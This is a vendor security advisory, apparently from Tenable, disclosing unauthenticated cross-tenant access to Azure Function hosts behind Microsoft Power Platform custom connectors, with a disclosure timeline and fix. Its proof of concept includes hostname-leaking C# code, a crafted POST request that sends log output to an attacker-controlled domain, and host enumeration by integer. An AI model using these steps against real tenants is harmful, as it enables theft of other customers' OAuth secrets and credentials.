Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Unauthorized Access to Cross-Tenant Applications in Microsoft Power Platform

Critical

Synopsis

A researcher at Tenable has discovered an issue that enables limited, unauthorized access to cross-tenant applications and sensitive data (including but not limited to authentication secrets).

Background

The issue occurred as a result of insufficient access control to Azure Function hosts, which are launched as part of the creation and operation of custom connectors in Microsoft’s Power Platform (Power Apps, Power Automation).

Certain connectors created for the Power Platform make use of custom C# code to connect and communicate with other services. That C# code is deployed as part of an Azure Function with an HTTP trigger. This Azure Function is deployed and managed by Microsoft, not as part of the customer’s environment.

Normally, customer interactions with their own custom connector take place through authenticated APIs (e.g. https://unitedstates-002.azure-apim.net/apim/connection-xyz). This API endpoint then proxies requests to communicate with the Microsoft-managed Azure Function without any form of authentication required.
 

diagram

Note: This is the diagram of how we understood these services to be communicating when reporting the issue. For a more detailed diagram see https://learn.microsoft.com/en-us/connectors/connectors

It was therefore possible for an attacker who determined the hostname of the Azure Function associated with the custom connector to interact with the function, as defined by the custom connector code, without authentication.With one such hostname, an attacker could determine the hostnames for Azure Functions associated with other customers’ custom connectors, as they differed only by an integer.

Many custom connectors are built to communicate with third-party services, and a common use, from what was seen during testing, appeared to be handling authentication flows between Microsoft’s Power Platform and these third-party services. 

As a result, it was possible to intercept OAuth client IDs and secrets, as well as other forms of authentication, when interacting with the unsecured Azure Function hosts.

It should be noted that this is not exclusively an issue of information disclosure, as being able to access and interact with the unsecured Function hosts, and trigger behavior defined by custom connector code, could have further impact. However, because of the nature of the service, the impact would vary for each individual connector, and would be difficult to quantify without exhaustive testing.
 

Proof of Concept / Steps to Reproduce:

1. Finding the connector hostname
When creating a custom connector in the power platform, one can specify custom C# code to run. The easiest way to determine a hostname which is assigned upon the creation of the custom connector/connection, is to use custom code like the following:

public class Script : ScriptBase
{
    public override async Task<HttpResponseMessage> ExecuteAsync()
    {
        HttpResponseMessage response = new HttpResponseMessage(HttpStatusCode.OK);
        response.Content = CreateJsonContent("{\"message\": \""+Environment.GetEnvironmentVariable("WEBSITE_HOSTNAME")+"\"}");
        return response;
    }
}

This code, when tested/run as a custom connector will return the hostname of the Azure Function on which your custom code is running.

{
  "message": "abc123xyz-fa-001.azurewebsites.net"
}

The abc123xyz portion of the hostname shown above remains static for a certain number of deployed Azure Functions, so all an attacker needs to do to find other valid hostnames is change the numeric portion of the host name. 

2. Crafting a POST request

Recall that these hosts are HTTP Trigger Azure Functions which take a POST request at /api/Script.
While they did not require authentication to interact with by default, they did expect a certain set of HTTP request headers to be set before they would finally pass to the custom connector code. 

X-Ms-Request-Method: set to GET
X-Ms-Request-Uri: set to the Base64 of an attacker controlled endpoint
X-Ms-Original-Request-Uri: set to the Base64 of an attacker controlled endpoint
X-Ms-Log-Blob-Sas-Uri: set to the Base64 of an attacker controlled endpoint
X-Ms-Operation-Id: It depends on the custom connector setup whether this is used or not, 
                   so it can be any string during enumeration of other hosts.

A simple POST request for example would be:

POST /api/Script HTTP/2
Host: abc123xyz-fa-001.azurewebsites.net
Content-Type: application/json
X-Ms-Request-Method: GET
X-Ms-Request-Uri: aHR0cHM6Ly9mYWtlY29ycC5jYQ==
X-Ms-Original-Request-Uri: aHR0cHM6Ly9mYWtlY29ycC5jYQ==
X-Ms-Log-Blob-Sas-Uri: aHR0cHM6Ly9mYWtlY29ycC5jYQ==
X-Ms-Operation-Id: test
Content-Length: 2

{}

Where aHR0cHM6Ly9mYWtlY29ycC5jYQ== is the base64 of an attacker controlled domain (in this case https://fakecorp.ca). Sending this request would send the log output or resulting request to the attacker controlled domain. 

An attacker could then increment 000 through 999 (though it is unknown how many applications would be associated with this same host name).

Once complete, the attacker could then launch a new custom connector to yield another hostname.
For example, instead of abc123xyz-fa-001.azurewebsites.net, they find lmn789qrs-fa-001.azurewebsites.net, and increment through the hosts again.

Example requests received using the steps described above:

client_credentials grant type

password grant_type

Solution

Microsoft has fixed the issue for newly deployed connectors by requiring Azure Function keys to access the Function hosts and their HTTP trigger. Additionally, we are no longer able to access previously affected hosts. We would refer customers who require additional details regarding the nature of the deployed remediations to Microsoft for authoritative answers.

Disclosure Timeline

30 March 2023 - Issue discovered and reported to Microsoft via MSRC
30 March 2023 - Microsoft acknowledges
3 April 2023 - Microsoft confirms issue
27 June 2023 - Tenable requests an update
6 July 2023 - Microsoft informs Tenable that the issue is fixed
10 July 2023 - Tenable informs Microsoft that the fix is incomplete
11 July 2023 - Tenable opens new MSRC case to track unfixed issue
11 July 2023 - Microsoft requests that public disclosure be delayed
14 July 2023 - Tenable notes that it will publish an advisory 2 weeks from July 17 (initially stating July 24th, later corrected to July 31st)
20 July 2023 - Microsoft inquires about what information will be shared about the issue
21 July 2023 - Tenable informs Microsoft that a limited advisory with no technical details or proofs of concept will be released
21 July 2023 - Microsoft acknowledges, and informs Tenable that a fix will take until 28 September 2023.
25 July 2023 - Tenable confirms it will withhold technical details and proofs-of-concept until 28 September.
31 July 2023 - Limited advisory released
3 August 2023 - Microsoft implements a fix for previously affected hosts
3 August 2023 - Tenable advisory updated with full details following Microsoft addressing a fix for all affected customers

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2023-25
Credit:
Evan Grant
Affected Products:
Microsoft Power Platform
Risk Factor:
Critical

Advisory Timeline

31 July 2023 - Initial advisory released
3 August 2023 - Advisory updated

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Formerly Tenable.io Web Application Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Formerly Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training